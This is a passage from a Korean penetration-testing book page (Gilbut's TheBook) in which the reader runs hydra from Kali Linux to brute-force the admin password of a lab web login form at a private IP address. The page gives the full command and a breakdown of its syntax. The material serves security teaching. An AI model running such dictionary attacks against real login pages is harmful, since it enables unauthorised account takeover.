더북(TheBook)
    모의 해킹으로 알아보는 리눅스 서버 보안과 해킹

    해당 구조를 파악했으면 다음과 같이 칼리에서 터미널을 열고 무차별 대입 도구를 통해 공격할 수 있다.

    칼리

    $ hydra -l admin -P /home/kaliuser/passwd.txt 192.168.100.11 http-post-form "/board/login_chk.php:id=^USER^&pw=^PASS^:fail" -V

    이 코드의 형식을 보면 다음과 같다.

    hydra -l [로그인 이름] -P [비밀번호 사전] [사이트 주소] [통신 방식] [Action 값/파라미터 정보:리턴 문자열]

     

    ▲ 그림 4-14 사전 파일(/home/kaliuser/passwd.txt)을 통해 admin 비밀번호를 찾아낸 화면

    신간 소식 구독하기
    뉴스레터에 가입하시고 이메일로 신간 소식을 받아 보세요.
    • 모의 해킹으로 알아보는 리눅스 서버 보안과 해킹(이하 '책')의 저작권은 장상근, 박진산에게 있습니다.
    • 책의 출판권 및 배타적발행권과 전자책의 배타적전송권은 (주)도서출판 길벗에 있습니다.
    • 책의 내용을 복제하여 블로그, 웹사이트 등에 게시할 수 없습니다.
      • 링크 및 SNS 공유는 허용합니다.
    • 책의 내용을 변경할 수 없습니다.
    • 책의 내용을 상업적으로 사용할 수 없습니다.
    • 책의 내용을 어떠한 형태로든 재배포할 수 없습니다.
    TheBook by Gilbut | 오류 신고 및 문의 | 서비스 약관 | 개인정보취급방침